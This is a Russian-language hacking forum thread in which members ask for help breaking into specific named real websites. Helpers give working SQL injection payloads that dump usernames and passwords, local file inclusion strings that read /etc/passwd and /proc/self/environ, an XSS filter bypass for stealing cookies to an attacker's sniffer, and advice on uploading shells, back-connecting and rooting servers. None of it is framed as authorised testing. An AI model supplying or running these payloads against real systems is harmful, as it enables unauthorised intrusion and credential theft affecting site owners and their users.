Samael91 said:
Подскажите пожалуйста это PHP-inj?
http://smsa.net.ru/tv/index.php?id=1h


нет.

Ребят подскажите, выдрал с сервера конфиг зенда, следующего вида

db.adapter = "pdo_mysql"

db.host = "blabla"

db.port = "3306"

db.username = "blabla"

db.password = "blabla"

db.dbname = "blabla"

db.charset ="utf8"

Порт из вне открыт к дб, а вот коннект сделать не могу, прочитал в разделе коддинга, что может быть строка в дб adress(то есть ip с которых можно подключиться к дб.) один разрешенный ip знаю, как подделать коннект с тем ip что знаю? или моя идея бредовая?

Здравствуйте, не могли бы вы подсказать ?

выдает на страничке:

Warning: include_once(../config.php) [function.include-once]: failed to open stream: No such file or directory in /www/ontariow/www/htdocs/usercp/store/addbal.php on line 1

Warning: include_once() [function.include]: Failed opening '../config.php' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in /www/ontariow/www/htdocs/usercp/store/addbal.php on line 1

Это несет в себе уязвимость ?

Zalepoks said:
Здравствуйте, не могли бы вы подсказать ?
выдает на страничке:
Warning: include_once(../config.php) [function.include-once]: failed to open stream: No such file or directory in /www/ontariow/www/htdocs/usercp/store/addbal.php on line 1
Warning: include_once() [function.include]: Failed opening '../config.php' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in /www/ontariow/www/htdocs/usercp/store/addbal.php on line 1
Это несет в себе уязвимость ?


информация очень скудна...при каких обстоятельствах появилось данное сообщение? что делал? и как? с такой инфой тебе никто ничего не скажет, экстрасенсов на форуме не наблюдал

это лк фришного айона ontarioworld.ru/usercp

дижок как бы dle. а ошибка вылазит в

http://ontarioworld.ru/usercp/prem.php?p=addbal

также есть ошибка в

http://ontarioworld.ru/usercp/cp.php

в отсальном дыр нет

Сильно не пинайте если что-то не так описал

Zalepoks said:
это лк фришного айона ontarioworld.ru/usercp
дижок как бы dle. а ошибка вылазит в
http://ontarioworld.ru/usercp/prem.php?p=addbal
также есть ошибка в
http://ontarioworld.ru/usercp/cp.php
в отсальном дыр нет
Сильно не пинайте если что-то не так описал


ну смотри, если на сайте есть какая нибудь ошибка, вернее текст какой нить ошибки без каких либо действий со стороны пользователя (имею в виду подставление ковычки, иаменение пост или гет запроса) , то это не значит что на ресурсе есть уязвимость..может она на данном ресурсе и есть.. но за тебя никто ничего делать не будет, предпринимай действия...и тогда уже обращайся

Zalepoks


Code:
http://ontarioworld.ru/usercp/prem.php?p=../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././



Lasteeck said:
если на сайте уже присутствует ошибка насколько я знаю, то сайт уже хакнут кем то


Флуданул,доволен?Тут люди вопросы задают,а ты какой-то бред несешь про ошибки,даже сам не понимая про что говоришь!!111

Если ошибка на сайте,то сайт хекнут,акуеть логика!11

Думаешь блеснул своим хекирским мастерством и показал смекалку,ответив в этой теме?Ты только лишний раз показал обратное...

Ребят никто так и не ответил на мой пост /showthread.php?p=2539364#post2539364, логику не понимаю, тут тема для флуда и гнобения других мемберов?

Lijzer said:
Ребят никто так и не ответил на мой пост /showthread.php?p=2539364#post2539364, логику не понимаю, тут тема для флуда и гнобения других мемберов?


не несет никакой уязвимости

Парни, остыньте.


Lijzer said:
Ребят подскажите, выдрал с сервера конфиг зенда, следующего вида
db.adapter = "pdo_mysql"
db.host = "blabla"
db.port = "3306"
db.username = "blabla"
db.password = "blabla"
db.dbname = "blabla"
db.charset ="utf8"
Порт из вне открыт к дб, а вот коннект сделать не могу, прочитал в разделе коддинга, что может быть строка в дб adress(то есть ip с которых можно подключиться к дб.) один разрешенный ip знаю, как подделать коннект с тем ip что знаю? или моя идея бредовая?


Вполне возможно, что так и есть.

Тогда ниче ты не сделаешь, там даже может быть IP локалхоста или локальный IP из их подсети.

IP спуфинг невозможен.

fl00der said:
Парни, остыньте.
Вполне возможно, что так и есть.
Тогда ниче ты не сделаешь, там даже может быть IP локалхоста или локальный IP из их подсети.


вот могу сказать на примере, если логиниться на шелле с этого сервера к БД, без проблем

Логиниться к этой же БД с другого шелла, возникают проблемы, никогда не получалось залогинться...

Попробуй через проги которые есть специально для соединения к БД (http://www.trans-manager.ru/doc/_login.htm) попробуй.

И есть еще прога WinSCP

Я не флужу, и ты не флуди. Тема для вопросов и я их задаю здесь.

Добрый) человек ответит, остальных прошу мимо.

Сайт связан с логин сервером.

И я в курсе что он уже хакнут, 100%

Но не могу найти дырку, для заливки.

Насчет etc/passwd он не содержит пароли, как я понимаю пароли затенены.

Есть какое-нибудь направление? Дальше бы я сам разобрался.

Как говориться начинать всегда тяжело))

Lasteeck said:
вот могу сказать на примере, если логиниться на шелле с этого сервера к БД, без проблем
Логиниться к этой же БД с другого шелла, возникают проблемы, никогда не получалось залогинться...
Попробуй через проги которые есть специально для соединения к БД (http://www.trans-manager.ru/doc/_login.htm) попробуй.
И есть еще прога WinSCP


Наверняка коннект к БД разрешен только с локалки или из подсети хостера.

У ТС наверняка нет шелла на том серваке.

fl00der said:
Парни, остыньте.
Вполне возможно, что так и есть.
Тогда ниче ты не сделаешь, там даже может быть IP локалхоста или локальный IP из их подсети.
IP спуфинг невозможен.


Во первых спасибо за то что откликнулся.

База находится на amazonaws.com (предоставляет кластеры и т.д.), подключение к дб на amazonaws.com идет от хоста где расположен сайт и это 100%. На сайт залить шелл не могу, в админке ничего нет. Есть скрипт PHP AJAX Image Upload, Truly Web 2.0! Но залить кроме изображений ничего не получается запрос обрабатывает по дефолту http://www.atwebresults.com/php_ajax_image_upload/, все варианты проверил. А здаваться, как то не хочется сайт вкусный

Zalepoks said:
Я не флужу, и ты не флуди. Тема для вопросов и я их задаю здесь.
Добрый) человек ответит, остальных прошу мимо.
Сайт связан с логин сервером.
И я в курсе что он уже хакнут, 100%
Но не могу найти дырку, для заливки.
Насчет etc/passwd он не содержит пароли, как я понимаю пароли затенены.
Есть какое-нибудь направление? Дальше бы я сам разобрался.
Как говориться начинать всегда тяжело))


дык тебе показали уже, читает /etc/passwd ..дальше ищи логи, сессию и т.д где записывается твои действия...и заливай шелл если получится, показали что читает/etc/passwd не для паролей, их там со времен динозавров не было, просто данный файл 100% существует на никс системах как например boot.ini в винде .

всем привет ввожу вв рег поле alert() рядом с полями вылетает \b \b \b что ето ?

бывает что и врёт, но как вариант попробуй отключить яваскрипт при регистрации

Подскажите делаю через SQLi Helper

Load File /etc/mysql/my.cnf

Текст отображается но только начало а потом обрывается как можно весь текст конфигурационного файла посмотреть???

Попробуй это сделать не через Sqlhelper. union+select+1,Load_file('/etc/mysql/my.cnf'),3+--+ и посмотреть почему выводится не весь файл

Seravin said:
Попробуй это сделать не через Sqlhelper. union+select+1,Load_file('/etc/mysql/my.cnf'),3+--+ и посмотреть почему выводится не весь файл


Класно получилось!!!

Можно ли через Load_file сделать ls -la? для просмотра папок или нужна другая комманда?

это просто читалка файлов насколько мне известно

http://dev.mysql.com/doc/refman/5.0/en/string-functions.html#function_load-file

noviyuser said:
Текст отображается но только начало а потом обрывается как можно весь текст конфигурационного файла посмотреть???


Для просмотра файлов при ограничении вывода можно использовать запрос вида


Code:
select substring(load_file('/patch/to/file/file.conf'),1,100)

Где первая цифра - символ, с которого начинать вывод, вторая - количество выводимых символов


noviyuser said:
Можно ли через Load_file сделать ls -la? для просмотра папок или нужна другая комманда?


Просматривать содержимое каталогов через load_file можно только, если сервер стоит на FreeBSD. В других случаях это невозможно. Выполнять какие-то ни было команды через load_file также невозможно.

Если работает лоадфайл, попробуй записать через INTO OUTFILE, если знаешь полный путь и есть куда записать (путь можно узнать, читая конфиг Апача, если найдешь).

т.к. он мне написал что пришлось захексить(насколько я понял), то into+outfile не прокатит

Seravin said:
т.к. он мне написал что пришлось захексить(насколько я понял), то into+outfile не прокатит


Хз, я не заметил это че-то, либо он это тебе в ПМ написал.

Тогда конечно.

Нашел на одном сайте уязвимость, но при вставлении ковычки он выводит код на белом фоне :

т.е SELECT * FROM subgrp WHERE sts = 1 and grp = 5\'

На сайте: http://autolv.com/index.php?grp_id=3'

Что делать?

И вот недавно наткнулся на одном сайте было что подобрал поля, но не где не выводиться инфа

http://asg.lv/index.php?mlng=5&mmen_id=4+union+select+1,2,3,4,5,6,7,8,9,10,11

Почему?

Заранее Спасибо

killrok6 said:
Нашел на одном сайте уязвимость, но при вставлении ковычки он выводит код на белом фоне :
т.е SELECT * FROM subgrp WHERE sts = 1 and grp = 5\'
На сайте: http://autolv.com/index.php?grp_id=3'
Что делать?


Логично же - не вставлять кавычку

И в этом конкретном примере вывод получить не удастся из-за двух запросов, выполняющихся подряд:


Code:
SELECT * FROM grp_des WHERE type = 'mgr' and grp_id =6 and lang='lang2'



Code:
SELECT * FROM subgrp WHERE sts = 1 and grp = 6

Успешно можно раскрутить скулю вот тут, например:


Code:
http://autolv.com/index.php?item_id=52



killrok6 said:
И вот недавно наткнулся на одном сайте было что подобрал поля, но не где не выводиться инфа
http://asg.lv/index.php?mlng=5&mmen_id=4+union+select+1,2,3,4,5,6,7,8,9,10,11
Почему?


Я думаю оно работает так:

Представим 2 запроса.

Причем один из них фильтруется, а второй нет.

В оба запроса передается один и тот же параметр

Результаты первого запроса выводятся на экран, а второго - нет.

Поэтому мы можем подобрать количество полей.

Но вывод получить не удастся.

Хотя есть некая странность, и


Code:
mmen_id=4-2

работает, при условии, что


Code:
mmen_id=if(1,2,3)

работать отказывается. Этого я объяснить не могу(

Прошу помощи

http://stomjob.ru/index.php?sub=search_vacbyid

В поле ID вакансии подставляем '

Получаем Error You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1

Помогите подобрать поля

Code:
http://ontarioworld.ru/usercp/store/prem.php?p=javajavascriptscript:alert%28%20String. fromCharCode%28120,115,115%29%29



Warning: include_once(config.php) [function.include-once]: failed to open stream: No such file or directory in /www/ontariow/www/htdocs/usercp/store/prem.php on line 2 Warning: include_once() [function.include]: Failed opening 'config.php' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in /www/ontariow/www/htdocs/usercp/store/prem.php on line 2 Warning: session_start() [function.session-start]: Cannot send session cache limiter - headers already sent (output started at /www/ontariow/www/htdocs/usercp/store/prem.php:2) in /www/ontariow/www/htdocs/usercp/store/prem.php on line 3 Fatal error: Call to undefined function sql() in /www/ontariow/www/htdocs/usercp/store/prem.php on line 4



Может мне ктонить разяснить, что сделать здесь дальше ?

ubi said:
Прошу помощи
http://stomjob.ru/index.php?sub=search_vacbyid
В поле ID вакансии подставляем '
Получаем Error You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1
Помогите подобрать поля


http://stomjob.ru/index.php?sub=show_vacancybyid

POST:


Code:
vacby_id=1 union select 1,version(),3,4,5,6,7,8,9,0,11,12,13,14,15,16,17,1 8,19,20,21,22,23,24,25,26-- 1

Либо можно вбить


Code:
1 union select 1,version(),3,4,5,6,7,8,9,0,11,12,13,14,15,16,17,1 8,19,20,21,22,23,24,25,26-- 1

В поле поиска вакансии



Code:
http://ontarioworld.ru/usercp/store/prem.php?p=javajavascriptscript:alert%28%20String. fromCharCode%28120,115,115%29%29

Может мне ктонить разяснить, что сделать здесь дальше ?


При этом запросе надо посмотреть внимательно на ошибку:


Code:
Warning: include_once(store/javajavascriptscript:alert(String.fromCharCode(120 ,115,115)).php

Где текст ошибки говорит сам за себя.

Seravin said:
бывает что и врёт, но как вариант попробуй отключить яваскрипт при регистрации


а если true что далше?

Zalepoks said:

Code:
http://ontarioworld.ru/usercp/store/prem.php?p=javajavascriptscript:alert%28%20String. fromCharCode%28120,115,115%29%29

Может мне ктонить разяснить, что сделать здесь дальше ?




Code:
http://ontarioworld.ru/usercp/store/prem.php?p=../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././

Мб подумать чуть-чуть? Ты второй похожий инлкюд за 3 дня выкладываешь, впредь тебе никто не будет крутить их,ибо самому думать надо!!!111

И зачем ты туда алерт впихивал ?о_О

Мб прочтешь уже что-нибудь, а то так и будешь задавать вопросы =/


DCrypt said:
~d0s~
, как ты узнал сколько ././././ вставлять?


Везде по-разном, где-то такой метод отсечения не сработует,где-то сработует. Вообще,если нулбайт не поддается экранизированию, то геморой с етим делать не надо,но этот случай как раз второй =/


fl00der said:
Путь посмотрел и посчитал вложенность.


Речь шла не о перемещение по каталогам ../ а про отброс расширения,т.к. там нулбайт поддается экранизированию, кароче если не понимаешь о чем вопрос,не надо пытаться ответить, темболее что я выше уже ответил.

~d0s~, как ты узнал сколько ././././ вставлять?

DCrypt said:
~d0s~
, как ты узнал сколько ././././ вставлять?


Путь посмотрел и посчитал вложенность.

Добрый вечер. Вот такая трабла, в пасивном XSS фильтрируется ">"

Вот код, показывает куки:

id=348532&returnto=>" уже есть. А как отправить куки на моем сервере? не пашет, так как используется ">" дважды

rootmd said:
Добрый вечер. Вот такая трабла, в пасивном XSS фильтрируется ">"
Вот код, показывает куки:
id=348532&returnto=>" уже есть. А как отправить куки на моем сервере? не пашет, так как используется ">" дважды


в каждом отдельном случае надо смотреть как обойти фильтр, как правило надо смотреть обрезается только > или полностью код, панацеи тут нет как вариант помогает закодировать строку ну например строку alert(document.cookie) полностью заменяет такой код data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raW UpPC9zY3JpcHQ+

как видиш в нем не содержиться символа >

вобщем нельзя что то советовать , не видя конкретного сайта с уязвимостью

~d0s~, как ты узнал сколько ././././ вставлять?


/thread98525.html

Для кого тему прилепили?

Да, конечно спасибо за то что искать направили. Поискал ещё часок. Никакого софта не нашел.

Проблема вот в чем:

Делаю ручками

LIMIT 0,1--

LIMIT 1,1--

LIMIT 2,1--

А это не совсем оптимально. Не удобно работать и времени много забирает.

Есть спец. софт который сам переберет базу и выведет все строки в удобном визуальном формате?

Нашел что то подобное. sql helper а ссылки все битые.

может кто знает про это я ниче норм не нашел

Drupal Droptor Module SQL Injection Vulnerability

http://secunia.com/advisories/43179

Fooog said:
Да, конечно спасибо за то что искать направили. Поискал ещё часок. Никакого софта не нашел.
Проблема вот в чем:
Делаю ручками
LIMIT 0,1--
LIMIT 1,1--
LIMIT 2,1--
А это не совсем оптимально. Не удобно работать и времени много забирает.
Есть спец. софт который сам переберет базу и выведет все строки в удобном визуальном формате?
Нашел что то подобное. sql helper а ссылки все битые.


Я не просто отправил в поиск, а еще и дал ссылку на топик

/showthread.php?t=240692

Как вариант, пробуй rsaUnDumper[sql] – универсальный дампер SQL INJECTION.

Redwood said:
Я не просто отправил в поиск, а еще и дал ссылку на топик
/showthread.php?t=240692
Как вариант, пробуй rsaUnDumper[sql] – универсальный дампер SQL INJECTION.


rsaundumper хорошо работает многопоточно, но там не поддерживается(может пока) запросы через POST инъекций

А если GETом то вот таких уж точно не признает

555555' UNION ALL SELECT 1,2,(SELECT concat(0x7e,0x27,unhex(Hex(cast(user.EMAIL as char))),0x5e,unhex(Hex(cast(user.PASSWORD as char))),0x27,0x7e) FROM `db`.user LIMIT 10000,1) -- a

Спасибо. Но тогда возникает вопрос по проге.

В ней надо что бы заканчивался запрос на +limit+

Как это сделать со стандартной скулей?

UNION SELECT 1,2,TABLE_NAME,4 ,5 FROM INFORMATION_SCHEMA.TABLES LIMIT 0,1 --

Fooog said:
Спасибо. Но тогда возникает вопрос по проге.
В ней надо что бы заканчивался запрос на +limit+
Как это сделать со стандартной скулей?
UNION SELECT 1,2,TABLE_NAME,4 ,5 FROM INFORMATION_SCHEMA.TABLES LIMIT 0,1 --


тут просто даеш проге так:

pxxp://site.com/script.php?id=1 UNION SELECT 1,2,,4 ,5 FROM INFORMATION_SCHEMA.TABLES+limit+

а в поле "Что нужно сдампить" ставиш TABLE_NAME

воббще если надо сначала тока табли слит быстро то вот так можно:

pxxp://site.com/script.php?id=1 UNION SELECT 1,2,(select concat(0x7e,0x27,Hex(cast(group_concat(table_name) as char)),0x27,0x7e) FROM information_schema.tables),4 ,5 --

выдает все табли разом в хексе

YuNi|[c said:
rsaundumper хорошо работает многопоточно, но там не поддерживается(может пока) запросы через POST инъекций
А если GETом то вот таких уж точно не признает
555555' UNION ALL SELECT 1,2,(SELECT concat(0x7e,0x27,unhex(Hex(cast(user.EMAIL as char))),0x5e,unhex(Hex(cast(user.PASSWORD as char))),0x27,0x7e) FROM `db`.user LIMIT 10000,1) -- a


POST запросы поддерживаются в версии 2.0

Для более сложных запросов подойдет Toolza от Pashkel'ы, которая кстати недавно обновилась

https://rdot.org/forum/showthread.php?t=1142

Добавил версию 2.0 /showpost.php?p=2544529&postcount=10 (https://antichat.live/showpost.php/p/2544529/postcount/10/)

Redwood said:
POST запросы поддерживаются в версии 2.0, просто я не обратил внимание какая версия выложена в топике, думал что она и есть, сейчас добавлю.
Для более сложных запросов подойдет Toolza от Pashkel'ы, которая кстати недавно обновилась https://rdot.org/forum/showthread.php?t=1142


я не посмотрель что ты выложил, у меня уже был какой то версия.

Ну тулзу я пробовал новую версию, но тоже не может хавать такие запросы

тут даже попросил кодерам подсказать или наколбасит

пару строк на перле именно для таких скулей(правда там дал я на одну колонку а тут две колонки)

/showthread.php?p=2536279

остался без ответа там

такой вопрос на счет фильтраций: ?var=-1+union+select+1,count(*),3,4,5+from information_schema.columns+where+table_schema!='in formation_schema'+--+ выводит количество, то есть не фильтруются даже кавычки, но вот выдернуть данные не получается вообще никакие. version() user() database() это все дает false. пробовал и так /*!verSion()*/ и 0x76657273696F6E2829 один хер - false. и это не только на эти три "слова", на все данные что пихаю в запрос.. не могу понять что за фильтры там стоят. если уже такое было не пинайте, тема большая всю ниасилить на трезвую голову.. буду рад ссылочке где описаны разные способы обхода такого рода фильтров.

Чакэ said:
такой вопрос на счет фильтраций: ?var=-1+union+select+1,count(*),3,4,5+from information_schema.columns+where+table_schema!='in formation_schema'+--+ выводит количество, то есть не фильтруются даже кавычки, но вот выдернуть данные не получается вообще никакие. version() user() database() это все дает false. пробовал и так /*!verSion()*/ и 0x76657273696F6E2829 один хер - false. и это не только на эти три "слова", на все данные что пихаю в запрос.. не могу понять что за фильтры там стоят. если уже такое было не пинайте, тема большая всю ниасилить на трезвую голову.. буду рад ссылочке где описаны разные способы обхода такого рода фильтров.


http://forum.antichat.net/thread104591.html

Вопрос №2

Чакэ said:
такой вопрос на счет фильтраций: ?var=-1+union+select+1,count(*),3,4,5+from information_schema.columns+where+table_schema!='in formation_schema'+--+ выводит количество, то есть не фильтруются даже кавычки, но вот выдернуть данные не получается вообще никакие. version() user() database() это все дает false. пробовал и так /*!verSion()*/ и 0x76657273696F6E2829 один хер - false. и это не только на эти три "слова", на все данные что пихаю в запрос.. не могу понять что за фильтры там стоят. если уже такое было не пинайте, тема большая всю ниасилить на трезвую голову.. буду рад ссылочке где описаны разные способы обхода такого рода фильтров.


да Redwood точно указал еще можно так:

unhex(Hex(cast(Version() as char)))

cast(Version()+as+binary)

Redwood, очень благодарен cast(concat_ws(0x3a,version(),user(),database())+a s+binary) - true

Вытянул дб, а нужные колонки в таком виде 000000060664599b, чем расшифровать? или подскажите алгоритм, который используется ...

Все разобрался, это уникальный идентификатор присвоенный скриптом ...

Вот. Нашел на свой вопрос удобный ответ. Товарищ помог

group_concat(char(0x3C,0x62,0x72,0x3E),TABLE_NAME)

Вдруг кому понадобиться.

А как можно переключать БД в Скуле например есть 4 БД, я сейчас нахожусь в 1-ой, а мне надо перейти в 3-ю.

Как это сделать ?

Ne1c said:
А как можно переключать БД в Скуле например есть 4 БД, я сейчас нахожусь в 1-ой, а мне надо перейти в 3-ю.
Как это сделать ?


1) Узнаем имеющиеся БД:


PHP:
union select 1,group_concat(schema_name)from in formation_schema.schemata+--+

2) Узнаем таблицы из определенной БД


PHP:
select 1,group_concat(table_name)from informatio n_schema.tables where table_schema='test'

3) Выводим данные из определенной БД:


PHP:
union select 1,password from test.users+--+

Ne1c said:
А как можно переключать БД в Скуле например есть 4 БД, я сейчас нахожусь в 1-ой, а мне надо перейти в 3-ю.
Как это сделать ?


1) Если не известно название БД, то узнать его можно таким запросом


Code:
Select table_schema from information_schema.tables where table_name = {Нужный_тебе_столбец}

2) Если известно, то "переключиться" можно так


Code:
Select Нужная_тебе_информация from table_schema.Нужный_тебе_столбец

Где table_schema - название необходимой БД

подскажите

http://databases.about.com/od/security/a/sql_inject_test.htm

в этой статье говорится


Internal Server Error
The server encountered an internal error or misconfiguration and was unable to complete your request.


бла-бла


If you receive either one of the two errors above, your application is vulnerable to SQL injection attack!


у меня тоже такая ошибка вылезла

но только model=pr11'&(другие параметры)

пробовал


model=pr11'+and+1=1+--+&(другие параметры)
model=pr11'+order+by+1+--+&(другие параметры)
model=pr11+order+by+1+--+&(другие параметры)
model=pr11+order+by+1/*&(другие параметры)


не помогает ошибка так и осталась

каким способом можно еще проверить?

Эта ошибка совсем не является однозначным показателем присутствия скули.

Также она может получаться, например, при конфликте кодировок (обычно бывает уже непосредственно при выводе)

В твоем случае я бы поставил, что скули нет.

noviyuser said:
подскажите
http://databases.about.com/od/security/a/sql_inject_test.htm
в этой статье говорится
бла-бла
у меня тоже такая ошибка вылезла
но только model=pr11'&(другие параметры)
пробовал
не помогает ошибка так и осталась
каким способом можно еще проверить?


покажи что за ошибки выдаёт и при каких запросах

просто в запросах могут быть например скобки, а ты комментируешь закрывающие. Поэтому я всегда смотрю id=1+and+1=1 или id=1'+and+'1'='1, т.к. работает внезависимости от скобок

У него лишь 500 ошибка, что бы он не подставлял.

Залил шелл, залажу в корень, в точку монтирования (/mnt), вижу отображение всего, что нужно а вот слить не могу, в чем проблема? или надо делать бекконнект, и рутать серв?

P/S права на чтение папки есть ...

Прав на файлы м.б. не хватает? Т.е. на папку права есть, а на содержимое ее нет.

Лучше рутай, если получится.

как сюда вствить ссылку на мой снифер

насчёт той скули, которая была в корне раздела ( http://chatium.com/user/profile?id=\' )

http://chatium.com/user/profile?id=1\') and (select 1 from(select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a) -- 1

активная xss

помогите составить правельный скрипт чтобы куки передались.....

http://forum.antichat.net/thread44125.html в статье расписано всё как нельзя лучше

........

я бы сделал например такой сниффер, чтобы он возвращал картинку:


Code:


По памяти пишу, могут быть какие-то мелкие ошибки, но идея думаю ясна

Подскажите со скулёй.

Ковырялся на денвере в скриптах одного слитого сайта, на локалке все прекрасно работает, а в сети не хочет.

На денвере провожу запросы вида:


Code:
' UNION SELECT 1,concat(login,0x3a,password),3,4,5,6,7 FROM users/*

' UNION SELECT 1,concat(login,0x3a,password),3,4,5 FROM users LIMIT 1,1/*

//Количество столбцов разное т.к. делаю через разные скрипты.

А на серваке не хочет ничего делать:

И так


Code:
' UNION SELECT 1,concat(login,0x3a,password),3,4,5,6,7 FROM users/*

' UNION SELECT 1,concat(login,0x3a,password),3,4,5 FROM users LIMIT 1,1/*

и вот так


Code:
' UNION SELECT 1,concat(login,0x3a,password),3,4,5,6,7 FROM users --

' UNION SELECT 1,concat(login,0x3a,password),3,4,5 FROM users LIMIT 1,1 --

В ответ получаю:


You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '--' limit 1' at line 1




You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '/*' limit 1' at line 1


Что ещё можно попробовать?

попробуй выложить скрипт

попробуй выложить скрипт


GPRS, замучаюсь. Только разобрался путём тыка:

После коммента -- поставил + и всё заработало =))

PHP:
$text=filter_var($text,FILTER_SANITIZE_STRING);



Долее переменная $text вставляется в запрос ".... WHERE text='".$text."' ...."

Возможно ли обойти данный фильтр?

если же в скрипте фильтруются кавычки, а возможно что-то еще, в следствии чего выводит "Hacking attempt!" возможно ли обойти?

Да шанс есть, попробуй крутить как слепую.

.......


Доступ к денверу из локалки

boortyhuhtyu said:
есть сайт в локальной сети и есть активная xss можно ли перехватывать куки с локального хостинга например денвер и какие ещё есьт варианты?


Доступ к денверу из локалки (http://www.denwer.ru/faq/shared.html)

Есть sql injection. трабла в том что в скрипте 2 запросы к бд. Если ставить "union+select+1" то ошибка "the used select statements have a different nubmer of columns", a если ставить "union+select+1,2,3.." то такая же ошибка только теперь у первого запроса.

Вот код:


Code:
$requestid = $_GET[requestid];

$res2 = mysql_query("select count(addedrequests.id) from addedrequests inner join users on addedrequests.userid = users.id inner join requests on addedrequests.requestid = requests.id WHERE addedrequests.requestid =$requestid") or die(mysql_error());
$row = mysql_fetch_array($res2);
$count = $row[0];

$res = mysql_query("select users.id as userid,users.username, users.downloaded,users.uploaded, requests.id as requestid, requests.request from addedrequests inner join users on addedrequests.userid = users.id inner join requests on addedrequests.requestid = requests.id WHERE addedrequests.requestid =$requestid $limit") or sqlerr();

Вывод через ошибку:

(1)and(select 1 from(select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a)--

либо так (select*from(select name_const(version(),1),name_const(version(),1))a)

спасибки, работало, но как можно например не "from information_schema.tables" a "from users where id='1'"?

вместо version() прописываешь например (select concat(username,0x3a,password) from users limit 0,1)

спасибо. но есть еше такой;

list.php?page=444444444444444444444444444444444


Code:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '6.66666666667E+33,15' at line 1

можно что-то замутить или иреально?

что можно зделать с путями с открытыми на серваке?

/images/spacer.gif

/icons/

/mail/

/robots.txt

/webmail/

/changelog.txt

boortyhuhtyu said:
что можно зделать с путями с открытыми на серваке?
/images/spacer.gif
/icons/
/mail/
/robots.txt
/webmail/
/changelog.txt


Ничего.


rootmd said:
спасибо. но есть еше такой;
list.php?page=444444444444444444444444444444444

Code:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '6.66666666667E+33,15' at line 1

можно что-то замутить или иреально?


Крути.

Как прописать proc/environ если пашет ток так:

.php?type=../../../../../../../../../../..
/etc/./passwd%00




" if author else f"

Как прописать proc/environ если пашет ток так:

.php?type=../../../../../../../../../../..
/etc/./passwd%00




Мож кто знает?

пробуй

/proc/self/net/../environ%00

Несколько раз помогло, смотря что именно фильтруется

Ребята, а тут есть скуль?

http://www.lamiaocAnti-G00GLEcasione.it/detail.php?siteid=40877


boortyhuhtyu said:
что можно зделать с путями с открытыми на серваке?
/images/spacer.gif
/icons/
/mail/
/robots.txt
/webmail/
/changelog.txt


Почти ничего, ну на /webmail/ может быть почтовый веб-клиент, посмотри, вдруг версия бажная.

Konqi said:
пробуй
/proc/self/net/../environ%00
Несколько раз помогло, смотря что именно фильтруется


